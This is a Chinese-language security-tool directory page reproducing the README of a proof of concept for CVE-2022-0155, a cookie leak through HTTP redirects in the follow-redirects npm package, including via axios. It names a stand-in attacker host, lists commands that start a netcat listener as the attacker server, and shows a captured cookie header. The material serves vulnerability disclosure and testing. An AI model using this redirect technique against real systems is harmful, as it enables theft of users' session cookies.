Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-0155-PoC — 概念验证,演示通过HTTP重定向在 follow-redirects npm 包中利用 CVE-2022-0155 窃取 cookie,包含 Express 服务器和客户端脚本,用于测试传递性依赖攻击。 | Kitploit
工具/GitHubGitHub/coana-tech/cve-2022-0155-poc
Payload生成漏洞分析漏洞利用Web安全渗透测试
GitHubcoana-tech/cve-2022-0155-poc

CVE-2022-0155-PoC

概念验证,演示通过HTTP重定向在 follow-redirects npm 包中利用 CVE-2022-0155 窃取 cookie,包含 Express 服务器和客户端脚本,用于测试传递性依赖攻击。

查看仓库
2年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-0155 概念验证 (PoC)

该仓库包含对 CVE-2022-0155 漏洞的演示。 该漏洞由 ranjit-git 发现,并在 此处 详细描述。 本 PoC 的目的是展示该漏洞不仅适用于将 follow-redirects 用作直接依赖的场景,也适用于通过 axios 将其用作间接/传递依赖的场景。

概述

该漏洞影响版本低于 1.14.7 的 follow-redirects npm 包。Follow-redirects 扩展了 内置 HTTP 模块,增加了跟随重定向的能力。

为了演示该漏洞,请考虑以下场景:

  1. follow-redirects 被用于向 https://example.com 发送 GET 请求。
  2. https://example.com 以 3xx 响应码回复,要求重定向到 https://attackers-webserver.com。
  3. follow-redirects 随后向 https://attackers-webserver.com 发送 GET 请求。

漏洞存在于第3步,因为易受攻击版本的 follow-redirects 包含了与第1步请求相同的 Cookie 头。这使得 https://attackers-webserver.com 能够窃取例如用户在 https://example.com 上的会话 ID,并获取用户数据。

攻击取决于攻击者能否控制重定向到 https://attackers-webserver.com。 在 PoC 中,使用 Express 服务器模拟 https://example.com 的行为。 该服务器有一个 GET API 端点 '/redirect',它会将客户端重定向到作为参数提供的 URL。 这模拟了攻击者可以控制客户端重定向到的 URL 的场景。

PoC

root@kitploit:~
npm install
node express-server.js
nc -l -v 8182 # or nc -lnvp 8182 on non-mac systems
node client.js 

你应该会看到运行 nc 的终端打印出以下输出:

root@kitploit:~
GET / HTTP/1.1
Accept: application/json, text/plain, */*
Cookie: session=some-secret-value
User-Agent: axios/0.21.4
Host: localhost:8182
Connection: keep-alive

该漏洞通过 nc 终端中出现 Cookie 头来展示,因为 nc(Netcat)服务器被用来代表攻击者的 web 服务器。

下载工具